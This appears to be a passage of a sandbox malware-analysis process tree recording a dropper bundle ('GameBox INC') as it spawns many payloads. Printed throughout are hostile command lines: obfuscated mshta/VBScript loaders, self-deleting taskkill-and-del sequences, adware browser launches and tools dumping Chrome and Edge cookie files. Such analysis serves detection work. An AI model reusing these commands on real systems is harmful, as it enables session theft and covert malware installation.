"C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:3948

C:\Windows\SysWOW64\taskkill.exe
taskkill /im runvd.exe /f
7⤵
- Kills process with taskkill
PID:3976

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:4220

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
PID:3028

C:\Users\Admin\AppData\Local\Temp\is-UI4S7.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UI4S7.tmp\Inlog.tmp" /SL5="$401BC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
6⤵
PID:3032

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
PID:1392

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:1316

C:\Users\Admin\AppData\Local\Temp\is-G6IGS.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G6IGS.tmp\MediaBurner2.tmp" /SL5="$10324,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
PID:672

C:\Users\Admin\AppData\Local\Temp\is-JKFI2.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-JKFI2.tmp\ultradumnibour.exe" /S /UID=burnerch2
7⤵
PID:2328

C:\Program Files\Google\PZHPFSGBRY\ultramediaburner.exe
"C:\Program Files\Google\PZHPFSGBRY\ultramediaburner.exe" /VERYSILENT
8⤵
PID:4912

C:\Users\Admin\AppData\Local\Temp\is-2JI55.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2JI55.tmp\ultramediaburner.tmp" /SL5="$4032E,281924,62464,C:\Program Files\Google\PZHPFSGBRY\ultramediaburner.exe" /VERYSILENT
9⤵
PID:4876

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
10⤵
PID:4596

C:\Users\Admin\AppData\Local\Temp\f0-b7080-06b-1e4b4-425ffdbf27982\Lezhaexoheqy.exe
"C:\Users\Admin\AppData\Local\Temp\f0-b7080-06b-1e4b4-425ffdbf27982\Lezhaexoheqy.exe"
8⤵
PID:3300

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
9⤵
PID:4388

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
9⤵
PID:1828

C:\Users\Admin\AppData\Local\Temp\db-90d88-911-915b0-7e8fafb124468\Dudegarywu.exe
"C:\Users\Admin\AppData\Local\Temp\db-90d88-911-915b0-7e8fafb124468\Dudegarywu.exe"
8⤵
PID:4036

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
PID:2756

C:\Users\Admin\AppData\Local\Temp\is-F6E8K.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F6E8K.tmp\WEATHER Manager.tmp" /SL5="$10326,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
PID:2664

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\is-46T5U.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-46T5U.tmp\VPN.tmp" /SL5="$10328,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
PID:3024

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
5⤵
PID:2484

C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
6⤵
PID:2236

C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
5⤵
PID:2304

C:\Users\Admin\Documents\TaEb911zpSMwPba_G23G_JxC.exe
"C:\Users\Admin\Documents\TaEb911zpSMwPba_G23G_JxC.exe"
6⤵
PID:3120

C:\Users\Admin\Documents\cBMZ5b_aSEDlpFvT8h6f54wR.exe
"C:\Users\Admin\Documents\cBMZ5b_aSEDlpFvT8h6f54wR.exe"
6⤵
PID:3112

C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe
"C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe"
6⤵
PID:3104

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
7⤵
PID:4904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\nTJzb8i7T0q50pHHO_SeKJ67.exe") do taskkill -IM "%~nXW" -f
8⤵
PID:1004

C:\Users\Admin\Documents\HCbuZXJ3ENkxJ5lnx1sfTh74.exe
"C:\Users\Admin\Documents\HCbuZXJ3ENkxJ5lnx1sfTh74.exe"
6⤵
PID:3096

C:\Users\Admin\Documents\q10pJXIbpZiXgcUxOLWw_bTB.exe
"C:\Users\Admin\Documents\q10pJXIbpZiXgcUxOLWw_bTB.exe"
6⤵
PID:3088

C:\Users\Admin\Documents\vTWvGzU1wUGJoILpauw24o1K.exe
"C:\Users\Admin\Documents\vTWvGzU1wUGJoILpauw24o1K.exe"
6⤵
PID:3080

C:\Users\Admin\Documents\oEDTvwhT_X_TGpQuj1J8Olto.exe
"C:\Users\Admin\Documents\oEDTvwhT_X_TGpQuj1J8Olto.exe"
6⤵
PID:1724

C:\Users\Admin\Documents\oEDTvwhT_X_TGpQuj1J8Olto.exe
C:\Users\Admin\Documents\oEDTvwhT_X_TGpQuj1J8Olto.exe
7⤵
PID:2304

C:\Users\Admin\Documents\jENmScoSQSbEpJsEcvTniX5f.exe
"C:\Users\Admin\Documents\jENmScoSQSbEpJsEcvTniX5f.exe"
6⤵
PID:612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "jENmScoSQSbEpJsEcvTniX5f.exe" /f & erase "C:\Users\Admin\Documents\jENmScoSQSbEpJsEcvTniX5f.exe" & exit
7⤵
PID:5056

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "jENmScoSQSbEpJsEcvTniX5f.exe" /f
8⤵
- Kills process with taskkill
PID:4992

C:\Users\Admin\Documents\qXnldw40pbMWKJpzNOOYzrEb.exe
"C:\Users\Admin\Documents\qXnldw40pbMWKJpzNOOYzrEb.exe"
6⤵
PID:396

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
6⤵
PID:2464

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
7⤵
PID:1016

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
7⤵
PID:2352

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
7⤵
PID:2672

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
7⤵
PID:2820

C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe
"C:\Users\Admin\Documents\U9O9OyR7vQy4EVf7nDvsECXi.exe"
7⤵
PID:2776

C:\Users\Admin\Documents\bxMph7yNS7Eb0Ffqp_Q3TDMC.exe
"C:\Users\Admin\Documents\bxMph7yNS7Eb0Ffqp_Q3TDMC.exe"
6⤵
PID:1148

C:\Users\Admin\AppData\Roaming\5564009.exe
"C:\Users\Admin\AppData\Roaming\5564009.exe"
7⤵
PID:2172

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2172 -s 976
8⤵
- Program crash
PID:5088

C:\Users\Admin\AppData\Roaming\1052844.exe
"C:\Users\Admin\AppData\Roaming\1052844.exe"
7⤵
PID:2788

C:\Users\Admin\AppData\Roaming\4541678.exe
"C:\Users\Admin\AppData\Roaming\4541678.exe"
7⤵
PID:3296

C:\Users\Admin\AppData\Roaming\2277805.exe
"C:\Users\Admin\AppData\Roaming\2277805.exe"
7⤵
PID:2384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 1640
8⤵
- Program crash
PID:2852

C:\Users\Admin\Documents\FxhXzrzALV45rdUrw4n93pwI.exe
"C:\Users\Admin\Documents\FxhXzrzALV45rdUrw4n93pwI.exe"
6⤵
PID:2692

C:\Users\Admin\Documents\FxhXzrzALV45rdUrw4n93pwI.exe
C:\Users\Admin\Documents\FxhXzrzALV45rdUrw4n93pwI.exe
7⤵
PID:3364

C:\Users\Admin\Documents\QNwy3e70C9OG5myytORwz8Re.exe
"C:\Users\Admin\Documents\QNwy3e70C9OG5myytORwz8Re.exe"
6⤵
PID:2740

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im QNwy3e70C9OG5myytORwz8Re.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\QNwy3e70C9OG5myytORwz8Re.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:3772

C:\Windows\SysWOW64\taskkill.exe
taskkill /im QNwy3e70C9OG5myytORwz8Re.exe /f
8⤵
- Kills process with taskkill
PID:4764

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:3396

C:\Users\Admin\Documents\xmtIIAPKnhR9juDHa3XxXwdP.exe
"C:\Users\Admin\Documents\xmtIIAPKnhR9juDHa3XxXwdP.exe"
6⤵
PID:2996

C:\Users\Admin\Documents\7t_iKB3xywiczNr3MVB5GnOt.exe
"C:\Users\Admin\Documents\7t_iKB3xywiczNr3MVB5GnOt.exe"
6⤵
PID:1756

C:\Users\Admin\Documents\fHdI0ueMk5pQCkcd5bAyicGE.exe
"C:\Users\Admin\Documents\fHdI0ueMk5pQCkcd5bAyicGE.exe"
6⤵
PID:2608

C:\Users\Admin\Documents\Zy5QxpC7r73GL5wKf_V_4NYt.exe
"C:\Users\Admin\Documents\Zy5QxpC7r73GL5wKf_V_4NYt.exe"
6⤵
PID:2868

C:\Users\Admin\Documents\Zy5QxpC7r73GL5wKf_V_4NYt.exe
"C:\Users\Admin\Documents\Zy5QxpC7r73GL5wKf_V_4NYt.exe"
7⤵
PID:3132

C:\Users\Admin\Documents\gSiknQsHIuoP4_xXEad8wm0Q.exe
"C:\Users\Admin\Documents\gSiknQsHIuoP4_xXEad8wm0Q.exe"
6⤵
PID:268

C:\Users\Admin\Documents\N55i8gAObnw6PQEDouW5NSN2.exe
"C:\Users\Admin\Documents\N55i8gAObnw6PQEDouW5NSN2.exe"
6⤵
PID:3892

C:\Users\Admin\Documents\1EMkZQM7CgOcetxwJ56ERMrR.exe
"C:\Users\Admin\Documents\1EMkZQM7CgOcetxwJ56ERMrR.exe"
6⤵
PID:3884

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\1EMKZQ~1.DLL,s C:\Users\Admin\DOCUME~1\1EMKZQ~1.EXE
7⤵
PID:1756

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\1EMKZQ~1.DLL,Sz0OQUFR
8⤵
PID:608

C:\Users\Admin\Documents\5Uj5zsFOTWTfz8UnCHVQZnNz.exe
"C:\Users\Admin\Documents\5Uj5zsFOTWTfz8UnCHVQZnNz.exe"
6⤵
PID:3876

C:\Users\Admin\Documents\7yCBYBZjQGIlhS8hCJEgXVAV.exe
"C:\Users\Admin\Documents\7yCBYBZjQGIlhS8hCJEgXVAV.exe"
6⤵
PID:3868

C:\Users\Admin\AppData\Local\Temp\is-55PDQ.tmp\7yCBYBZjQGIlhS8hCJEgXVAV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-55PDQ.tmp\7yCBYBZjQGIlhS8hCJEgXVAV.tmp" /SL5="$400F4,138429,56832,C:\Users\Admin\Documents\7yCBYBZjQGIlhS8hCJEgXVAV.exe"
7⤵
PID:4092

C:\Users\Admin\Documents\7YDMsX7R4U4BbRqlkEzEo0Nj.exe
"C:\Users\Admin\Documents\7YDMsX7R4U4BbRqlkEzEo0Nj.exe"
6⤵
PID:3860

C:\Users\Admin\Documents\7YDMsX7R4U4BbRqlkEzEo0Nj.exe
"C:\Users\Admin\Documents\7YDMsX7R4U4BbRqlkEzEo0Nj.exe" -q
7⤵
PID:3820

C:\Users\Admin\Documents\b6_iZnknTaogUmiW0FaS4hDb.exe
"C:\Users\Admin\Documents\b6_iZnknTaogUmiW0FaS4hDb.exe"
6⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "b6_iZnknTaogUmiW0FaS4hDb.exe" /f & erase "C:\Users\Admin\Documents\b6_iZnknTaogUmiW0FaS4hDb.exe" & exit
7⤵
PID:2372

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "b6_iZnknTaogUmiW0FaS4hDb.exe" /f
8⤵
- Kills process with taskkill
PID:4688

C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
5⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\tmp3524_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3524_tmp.exe"
6⤵
PID:4452

C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
7⤵
PID:836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
7⤵
PID:4308

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
PID:2464

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
9⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
9⤵
PID:1860

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
10⤵
PID:3792

C:\Windows\SysWOW64\PING.EXE
ping MRBKYMNO -n 30
9⤵
- Runs ping.exe
PID:4648

C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
5⤵
PID:2124

C:\Users\Admin\AppData\Roaming\8999241.exe
"C:\Users\Admin\AppData\Roaming\8999241.exe"
6⤵
PID:1776

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1776 -s 1696
7⤵
- Program crash
PID:3212

C:\Users\Admin\AppData\Roaming\5736322.exe
"C:\Users\Admin\AppData\Roaming\5736322.exe"
6⤵
PID:2596

C:\Users\Admin\AppData\Roaming\2183014.exe
"C:\Users\Admin\AppData\Roaming\2183014.exe"
6⤵
PID:1308

C:\Users\Admin\AppData\Roaming\1760361.exe
"C:\Users\Admin\AppData\Roaming\1760361.exe"
6⤵
PID:892

C:\Users\Admin\AppData\Roaming\6033784.exe
"C:\Users\Admin\AppData\Roaming\6033784.exe"
6⤵
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1548
7⤵
- Program crash
PID:4756

C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
5⤵
PID:2680

C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
6⤵
PID:3516

C:\Users\Admin\Documents\rTJmpNroSzcZ2hyO5FgjcQTc.exe
"C:\Users\Admin\Documents\rTJmpNroSzcZ2hyO5FgjcQTc.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Users\Admin\Documents\Tmdiz4Ahkp0qK_LXBwgMO6H6.exe
"C:\Users\Admin\Documents\Tmdiz4Ahkp0qK_LXBwgMO6H6.exe"
2⤵
- Executes dropped EXE
PID:1308

C:\Users\Admin\Documents\Tmdiz4Ahkp0qK_LXBwgMO6H6.exe
"C:\Users\Admin\Documents\Tmdiz4Ahkp0qK_LXBwgMO6H6.exe" -q
3⤵
- Executes dropped EXE
PID:2908

C:\Users\Admin\Documents\Xe_oJj6i8BAAxfMFceiuazGr.exe
"C:\Users\Admin\Documents\Xe_oJj6i8BAAxfMFceiuazGr.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2328

C:\Users\Admin\Documents\En4NVU90WutUC9D7nfHts7iL.exe
"C:\Users\Admin\Documents\En4NVU90WutUC9D7nfHts7iL.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:2456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im En4NVU90WutUC9D7nfHts7iL.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\En4NVU90WutUC9D7nfHts7iL.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:1316

C:\Windows\SysWOW64\taskkill.exe
taskkill /im En4NVU90WutUC9D7nfHts7iL.exe /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:752

C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe
"C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe"
2⤵
- Executes dropped EXE
PID:1544

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
3⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\7sHzdYiVMSB3TOEUPDZQK5Zh.exe") do taskkill -IM "%~nXW" -f
4⤵
PID:2612

C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
5⤵
PID:548

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
6⤵
PID:1640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
7⤵
PID:2176

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
6⤵
PID:584

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "7sHzdYiVMSB3TOEUPDZQK5Zh.exe" -f
5⤵
- Kills process with taskkill
PID:828

C:\Users\Admin\Documents\lLgC0EKpkZisGEHVNAEGO6l6.exe
"C:\Users\Admin\Documents\lLgC0EKpkZisGEHVNAEGO6l6.exe"
2⤵
- Executes dropped EXE
PID:2400

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
PID:2432

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:832

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:2936

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1676

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:2084

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2288

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:316

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:1316

C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
4⤵
PID:2184

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
PID:2312

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
PID:1584

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2368

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:2264

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:3420

C:\Users\Admin\Documents\aJ6ZfNVNgPjOdhWzvFy_Kp7D.exe
"C:\Users\Admin\Documents\aJ6ZfNVNgPjOdhWzvFy_Kp7D.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Users\Admin\Documents\aJ6ZfNVNgPjOdhWzvFy_Kp7D.exe
"C:\Users\Admin\Documents\aJ6ZfNVNgPjOdhWzvFy_Kp7D.exe"
3⤵
PID:2512

C:\Users\Admin\Documents\ECzqtoSdTwQlzsvXNDVuT18b.exe
"C:\Users\Admin\Documents\ECzqtoSdTwQlzsvXNDVuT18b.exe"
2⤵
- Executes dropped EXE
PID:912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ECzqtoSdTwQlzsvXNDVuT18b.exe" /f & erase "C:\Users\Admin\Documents\ECzqtoSdTwQlzsvXNDVuT18b.exe" & exit
3⤵
PID:2700

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ECzqtoSdTwQlzsvXNDVuT18b.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2708

C:\Users\Admin\Documents\NXEijWOxlzk42RZ2yCCV084R.exe
"C:\Users\Admin\Documents\NXEijWOxlzk42RZ2yCCV084R.exe"
2⤵
- Executes dropped EXE
PID:976

C:\Users\Admin\Documents\pGmtjctP71XG3AzNVwNbBrlb.exe
"C:\Users\Admin\Documents\pGmtjctP71XG3AzNVwNbBrlb.exe"
2⤵
- Executes dropped EXE
PID:1072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "pGmtjctP71XG3AzNVwNbBrlb.exe" /f & erase "C:\Users\Admin\Documents\pGmtjctP71XG3AzNVwNbBrlb.exe" & exit
3⤵
PID:2804

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "pGmtjctP71XG3AzNVwNbBrlb.exe" /f
4⤵
- Kills process with taskkill
PID:1656

C:\Users\Admin\Documents\LCxbJdJpXSrgOVv_SOAB5YuM.exe
"C:\Users\Admin\Documents\LCxbJdJpXSrgOVv_SOAB5YuM.exe"
2⤵
- Executes dropped EXE
PID:2172

C:\Users\Admin\Documents\LCxbJdJpXSrgOVv_SOAB5YuM.exe
"C:\Users\Admin\Documents\LCxbJdJpXSrgOVv_SOAB5YuM.exe"
3⤵
PID:3344

C:\Users\Admin\Documents\5q0K0i9foev8sHDRlHjePKbC.exe
"C:\Users\Admin\Documents\5q0K0i9foev8sHDRlHjePKbC.exe"
2⤵
- Executes dropped EXE
PID:1916

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\5Q0K0I~1.DLL,s C:\Users\Admin\DOCUME~1\5Q0K0I~1.EXE
3⤵
PID:3472

C:\Windows\SysWOW64\RUNDLL32.EXE
C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5Q0K0I~1.DLL,NwA3bQ==
4⤵
PID:4032

C:\Windows\SysWOW64\RUNDLL32.EXE
